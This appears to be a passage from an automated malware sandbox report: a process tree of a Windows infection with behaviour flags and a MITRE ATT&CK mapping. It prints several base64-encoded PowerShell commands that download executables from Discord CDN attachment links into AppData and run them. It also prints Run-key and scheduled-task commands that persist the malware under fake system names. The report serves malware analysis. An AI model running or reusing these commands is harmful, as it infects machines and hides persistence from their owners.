        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADYAMQA5ADYAOAAzADkANAAzADEAMQAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGEAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegBzAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBqAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQApADwAIwB3AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHgAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABjAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQA8ACMAcgBrAHQAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
        
        C:\Users\Admin\AppData\Roaming\6.exe
        
        "C:\Users\Admin\AppData\Roaming\6.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2088
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
        
        C:\Users\Admin\AppData\Local\Temp\wTKv2uf4BU.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANQAwADMAMAAzADEAMAAzADgANwA3ADIAMgAvAGwAaQBlAG8AZABvAGMAZQBtAHAALgBlAHgAZQAnACwAIAA8ACMAeABhAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHgAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGsAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApACkAPAAjAHoAdAB1ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGoAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApADwAIwBlAGoAZAAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
        
        C:\Users\Admin\AppData\Roaming\7.exe
        
        "C:\Users\Admin\AppData\Roaming\7.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5596
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5868
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
        
        C:\Users\Admin\AppData\Local\Temp\xlDQsyUn1K.exe
        7⤵
        
        PID:3708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADAANAA1ADAAMgA4ADIAMQAyADcAOAA3AC8AVwBQAHIAbwB0AGUAYwBNAHMAYwB2AC4AZQB4AGUAJwAsACAAPAAjAHQAYQB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBxAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwByAGwAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcAByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAawBmAGgAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
        
        C:\Users\Admin\AppData\Roaming\8.exe
        
        "C:\Users\Admin\AppData\Roaming\8.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv' -Value '"C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5152
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \WProtecMscv /tr "C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \WProtecMscv /tr "C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:3908
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\Si9aUuEGXI.exe
        6⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\Si9aUuEGXI.exe
        
        C:\Users\Admin\AppData\Local\Temp\Si9aUuEGXI.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAagBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADAANgAzADkANQAyADkAMQAyADQAMwA0AC8ASABEAFMAWQAyADEAVQAuAGUAeABlACcALAAgADwAIwB6AHUAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAcABnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAegB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADkALgBlAHgAZQAnACkAKQA8ACMAaABtAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABoAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AZQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADkALgBlAHgAZQAnACkAPAAjAG0AaQBrACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\069Ny9YeyT.exe
        6⤵
        
        PID:5104
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\NAQiIfFW2x.exe
        6⤵
        
        PID:2332

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4424

C:\Users\Admin\AppData\Local\Temp\NAQiIfFW2x.exe
C:\Users\Admin\AppData\Local\Temp\NAQiIfFW2x.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADQANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADAAOQA1ADUANQA2ADkAOAAwADgAMgA4AC8ATgBDAE4AWABKADIALgBlAHgAZQAnACwAIAA8ACMAYwB1AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG0AZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAG0AaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAKQA8ACMAbAB6AGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQB1AGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHAAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMAAuAGUAeABlACcAKQA8ACMAZwBsAGYAIwA+AA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADYAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADIANQAxADEAMQA1ADMAMwA5ADgANAA3AC8AZgB1AGgAYwBoAC4AZQB4AGUAJwAsACAAPAAjAHAAbABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgB6AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQByAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAxAC4AZQB4AGUAJwApACkAPAAjAGIAagBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHoAbABnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGUAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADEALgBlAHgAZQAnACkAPAAjAGcAbQBwACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Users\Admin\AppData\Local\Temp\069Ny9YeyT.exe
C:\Users\Admin\AppData\Local\Temp\069Ny9YeyT.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:2240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:2164

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
1⤵
PID:4260
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
  2⤵
  - Creates scheduled task(s)
  PID:2928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
1⤵
PID:4964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
1⤵
PID:3112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5260 -ip 5260
1⤵
PID:5300

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
1⤵
- Executes dropped EXE
PID:5660

C:\Users\Admin\AppData\Roaming\3.exe
C:\Users\Admin\AppData\Roaming\3.exe
1⤵
- Executes dropped EXE
PID:5212

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

System Information Discovery